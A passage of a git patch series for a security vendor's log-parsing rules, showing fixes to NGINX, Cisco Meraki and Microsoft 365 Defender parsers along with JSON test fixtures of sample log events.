-              {%- if parsed_event.message.response_status < 200 -%}
+              {%- if 100 <= parsed_event.message.response_status | int < 200 -%}
                 information
-              {%- elif parsed_event.message.response_status < 300 -%}
+              {%- elif 100 < parsed_event.message.response_status| int < 300 -%}
                 success
-              {%- elif parsed_event.message.response_status < 400 -%}
+              {%- elif 100 < parsed_event.message.response_status | int < 400 -%}
                 redirect
               {%- else -%}
                 failure
diff --git a/NGINX/nginx/tests/json_get.json b/NGINX/nginx/tests/json_get.json
new file mode 100644
index 000000000..0b3f93100
--- /dev/null
+++ b/NGINX/nginx/tests/json_get.json
@@ -0,0 +1,61 @@
+{
+  "input": {
+    "message": "{\"connection_serial_number\":123456789,\"number_of_requests\":1,\"response_status\":\"200\",\"body_bytes_sent\":37273,\"content_type\":\"\",\"host\":\"www.test.fr\",\"host_name\":\"nginxe.test.fr\",\"http_name\":\"\",\"https\":\"on\",\"proxy_protocol_addr\":\"\",\"proxy_protocol_port\":\"\",\"query_string\":\"redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F\",\"client_address\":\"1.2.3.4\",\"http_ar_real_proto\":\"\",\"http_ar_real_ip\":\"\",\"http_ar_real_country\":\"\",\"http_x_real_ip\":\"\",\"http_x_forwarded_for\":\"1234:567:abcd:890:1234:5678:abcd:9012\",\"http_config\":\"\",\"client_port\":\"43834\",\"remote_user\":\"\",\"request\":\"GET /fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F HTTP/2.0\",\"request_time\":0.264,\"request_id\":\"1234567890abcdefg1234567890abcde\",\"request_length\":1481,\"sekoia.intake.nginx\":\"AbCdEfG1aBcDeFg2AbCdEfG3aBcDeFg4\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "F5 NGINX",
+        "dialect_uuid": "ab25af2e-4916-40ba-955c-34d2301c1f51"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"connection_serial_number\":123456789,\"number_of_requests\":1,\"response_status\":\"200\",\"body_bytes_sent\":37273,\"content_type\":\"\",\"host\":\"www.test.fr\",\"host_name\":\"nginxe.test.fr\",\"http_name\":\"\",\"https\":\"on\",\"proxy_protocol_addr\":\"\",\"proxy_protocol_port\":\"\",\"query_string\":\"redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F\",\"client_address\":\"1.2.3.4\",\"http_ar_real_proto\":\"\",\"http_ar_real_ip\":\"\",\"http_ar_real_country\":\"\",\"http_x_real_ip\":\"\",\"http_x_forwarded_for\":\"1234:567:abcd:890:1234:5678:abcd:9012\",\"http_config\":\"\",\"client_port\":\"43834\",\"remote_user\":\"\",\"request\":\"GET /fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F HTTP/2.0\",\"request_time\":0.264,\"request_id\":\"1234567890abcdefg1234567890abcde\",\"request_length\":1481,\"sekoia.intake.nginx\":\"AbCdEfG1aBcDeFg2AbCdEfG3aBcDeFg4\"}",
+    "event": {
+      "category": [
+        "web"
+      ],
+      "dataset": "access",
+      "duration": 264000000.0,
+      "outcome": "success",
+      "type": [
+        "error"
+      ]
+    },
+    "action": {
+      "name": "GET",
+      "outcome": "success"
+    },
+    "destination": {
+      "address": "www.test.fr",
+      "domain": "www.test.fr"
+    },
+    "host": {
+      "name": "nginxe.test.fr"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 37273,
+        "status_code": 200
+      },
+      "version": "2.0"
+    },
+    "observer": {
+      "product": "nginx",
+      "type": "WEB server",
+      "vendor": "F5"
+    },
+    "related": {
+      "hosts": [
+        "www.test.fr"
+      ]
+    },
+    "url": {
+      "original": "/fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F",
+      "path": "/fr/test-integration",
+      "query": "redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F"
+    }
+  }
+}
\ No newline at end of file

From 378e3832fbb6fe83de6baaa47988feee33d21fa2 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 3 Oct 2024 14:58:27 +0300
Subject: [PATCH 111/317] Cisco Meraki MX - parse MAC address

---
 Cisco/cisco-meraki/ingest/parser.yml          |  2 +
 .../tests/test_flows_with_mac.json            | 46 +++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 Cisco/cisco-meraki/tests/test_flows_with_mac.json

diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml
index 85652b26a..7f3baaa74 100644
--- a/Cisco/cisco-meraki/ingest/parser.yml
+++ b/Cisco/cisco-meraki/ingest/parser.yml
@@ -210,6 +210,8 @@ stages:
           user_agent.original: "{{kv_part_message.message.agent}}"
   set_flows:
     actions:
+      - set:
+          source.mac: "{{kv_part_message.message.mac}}"
       - dictionary:
           "0": allow
           "1": deny
diff --git a/Cisco/cisco-meraki/tests/test_flows_with_mac.json b/Cisco/cisco-meraki/tests/test_flows_with_mac.json
new file mode 100644
index 000000000..81b5eebbe
--- /dev/null
+++ b/Cisco/cisco-meraki/tests/test_flows_with_mac.json
@@ -0,0 +1,46 @@
+{
+  "input": {
+    "message": "1727862163.911654119 FW_MX_01 flows allow src=1.2.3.4 dst=5.6.7.8 mac=00:11:22:33:44:55 protocol=icmp6 type=136"
+  },
+  "expected": {
+    "message": "1727862163.911654119 FW_MX_01 flows allow src=1.2.3.4 dst=5.6.7.8 mac=00:11:22:33:44:55 protocol=icmp6 type=136",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "flows",
+      "outcome": "allow",
+      "type": [
+        "allowed"
+      ]
+    },
+    "@timestamp": "2024-10-02T09:42:43.911654Z",
+    "action": {
+      "outcome": "allow"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8"
+    },
+    "network": {
+      "protocol": "icmp6"
+    },
+    "observer": {
+      "hostname": "FW_MX_01"
+    },
+    "related": {
+      "hosts": [
+        "FW_MX_01"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "mac": "00:11:22:33:44:55"
+    }
+  }
+}
\ No newline at end of file

From 4ee5a44352486c62e4f59be6596d6aed2831965d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 4 Oct 2024 10:29:28 +0200
Subject: [PATCH 112/317] refactor(Microsoft): reduce some filters

---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index d183492a1..f489a4558 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -259,7 +259,7 @@ stages:
           process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
           process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
           process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
-        filter: '{{ json_event.message.get("category") != "AdvancedHunting-DeviceEvents" and json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
+        filter: '{{ json_event.message.get("category") not in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}'
 
       - set:
           process.name: "{{json_event.message.properties.FileName}}"
@@ -280,7 +280,7 @@ stages:
           process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
           process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
           process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
-        filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceEvents" or json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
+        filter: '{{json_event.message.get("category") in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}'
   set_alert_evidence_fields:
     actions:
       - set:

From 74428e7e88beae6de63197b87be7eb4e34ccebb2 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 4 Oct 2024 10:39:30 +0200
Subject: [PATCH 113/317] Fix filter

---
 .../microsoft-365-defender/ingest/parser.yml  |   2 +-
 .../tests/test_additional_fields_error1.json  | 115 ++++++++++++++++++
 2 files changed, 116 insertions(+), 1 deletion(-)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 0704ce4ca..142a05997 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -26,7 +26,7 @@ pipeline:
         input_field: "{{json_event.message.properties.LoggedOnUsers}}"
         output_field: "users"
   - name: parse_additional_fields
-    filter: '{{json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}'
+    filter: '{{json_event.message.get("category") in ["AdvancedHunting-AlertEvidence","AdvancedHunting-DeviceNetworkEvents"] and json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}'
     external:
       name: json.parse-json
       properties:
diff --git a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json
new file mode 100644
index 000000000..c3f8b5f91
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json
@@ -0,0 +1,115 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    },
+    "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 \",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"<test.JDOE.outlook.com>\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 \",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"<test.JDOE.outlook.com>\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "cloud_app_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-01T08:18:26Z",
+    "action": {
+      "properties": {
+        "Application": "Microsoft Exchange Online",
+        "ApplicationId": "20893",
+        "IPCategory": "Cloud provider",
+        "IPTags": [
+          "Microsoft 365",
+          "Microsoft 365 Common and Office Online server",
+          "Microsoft Azure"
+        ],
+        "ISP": "Microsoft 365 Common and Office Online server",
+        "IsAdminOperation": "false",
+        "IsAnonymousProxy": "false",
+        "IsExternalUser": false,
+        "IsImpersonated": false,
+        "ObjectName": "Send",
+        "ObjectType": "Task",
+        "RawEventData": "{\"AppId\": \"00000003-0000-0000-c000-000000000000\", \"ClientAppId\": \"22222222-2222-2222-2222-8e9a218ac860\", \"ClientIP\": \"1.2.3.4\", \"ClientIPAddress\": \"1.2.3.4 \", \"ClientInfoString\": \"Client=Client;Client=ClientSystem;;\", \"ClientRequestId\": \"22222222-2222-2222-2222-865deac528e4\", \"CreationTime\": \"2024-10-01T08:18:26Z\", \"ExternalAccess\": false, \"Id\": \"22222222-2222-2222-2222-08dce1f19ff1\", \"InternalLogonType\": 0, \"Item\": {\"Id\": \"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\", \"ImmutableId\": \"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\", \"InternetMessageId\": \"<test.JDOE.outlook.com>\", \"ParentFolder\": {\"Id\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\", \"Path\": \"\\\\\\\\Drafts\"}, \"SizeInBytes\": 4199, \"Subject\": \"subject test\"}, \"LogonType\": 0, \"LogonUserSid\": \"S-1-1-11-33333333333-222222222-66666666666-9341774\", \"MailboxGuid\": \"22222222-2222-2222-2222-b228527c6288\", \"MailboxOwnerMasterAccountSid\": \"S-1-1-11\", \"MailboxOwnerSid\": \"S-1-1-11-33333333333-222222222-66666666666-9341774\", \"MailboxOwnerUPN\": \"noreply@test.co\", \"Operation\": \"Send\", \"OrganizationId\": \"22222222-2222-2222-2222-c5ea28204b4b\", \"OrganizationName\": \"test.onmicrosoft.com\", \"OriginatingServer\": \"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\", \"RecordType\": 2, \"ResultStatus\": \"Succeeded\", \"SaveToSentItems\": true, \"UserId\": \"noreply@test.co\", \"UserKey\": \"22222222-2222-2222-2222-8e9a218ac860\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}"
+      },
+      "type": "Send"
+    },
+    "host": {
+      "os": {
+        "full": "Unknown"
+      },
+      "type": "Other"
+    },
+    "microsoft": {
+      "defender": {
+        "activity": {
+          "objects": [
+            {
+              "ApplicationId": 11166,
+              "ApplicationInstance": 0,
+              "Id": "22222222-2222-2222-2222-8e9a218ac860",
+              "Name": "jDOE microsoft graph",
+              "Role": "Actor",
+              "Type": "Account"
+            },
+            {
+              "Role": "Parameter",
+              "ServiceObjectType": "Session ID",
+              "Type": "Structured object"
+            },
+            {
+              "Name": "Send",
+              "Role": "Target object",
+              "Type": "Task"
+            },
+            {
+              "ApplicationId": 11166,
+              "ApplicationInstance": 0,
+              "Id": "22222222-2222-2222-2222-e7a7d2c427c8",
+              "Name": "noreply jDOE",
+              "Role": "Parameter",
+              "Type": "User"
+            }
+          ],
+          "type": "Run"
+        },
+        "report": {
+          "id": "22222222-2222-2222-2222-a036-08dce1f19ff1"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "geo": {
+        "city_name": "Paris",
+        "country_iso_code": "FR"
+      },
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "full_name": "jDOE microsoft graph"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Other",
+      "original": "Client=Client;Client=Client;;",
+      "os": {
+        "name": "Other"
+      }
+    }
+  }
+}
\ No newline at end of file

From c2d470cdcc470774c75bb6f61cf48d99058788c3 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 4 Oct 2024 10:41:12 +0200
Subject: [PATCH 114/317] Apply linter

---
 .../tests/test_additional_fields_error1.json                  | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json
index c3f8b5f91..062589e72 100644
--- a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json
+++ b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 \",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"<test.JDOE.outlook.com>\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 Defender",
         "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
       }
-    },
-    "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 